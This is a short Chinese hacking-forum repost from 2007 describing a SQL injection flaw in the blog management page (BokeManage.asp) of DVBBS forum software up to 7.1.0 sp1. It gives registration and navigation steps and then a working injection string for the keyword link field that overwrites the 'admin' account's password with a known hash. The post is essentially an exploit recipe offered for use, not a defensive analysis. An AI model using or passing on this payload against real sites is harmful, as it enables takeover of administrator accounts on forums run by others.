黑色海岸线论坛 - Powered by Discuz! Board

标题: [转载] DVBBS <= 7.1.0 sp1 博客远程注入漏洞 [打印本页]

作者: stylehack 时间: 2007-3-31 23:55 标题: DVBBS <= 7.1.0 sp1 博客远程注入漏洞

漏洞文件:BokeManage.asp
受影响版本:DVBBS <= 7.1.0 sp1 SQL版

利用方法 (转自守护天使's Blog):
注册会员→ 进入管理博客→关健字设置
随便填

再编辑关健字

上面几个还是随便填写。。
在第三个，也就是连接地址这里写入语句
123123'where 1=0;update dv_user set userpassword='469e80d32c0559f8' where username='admin'--

欢迎光临黑色海岸线论坛 (http://bbs.thysea.com/)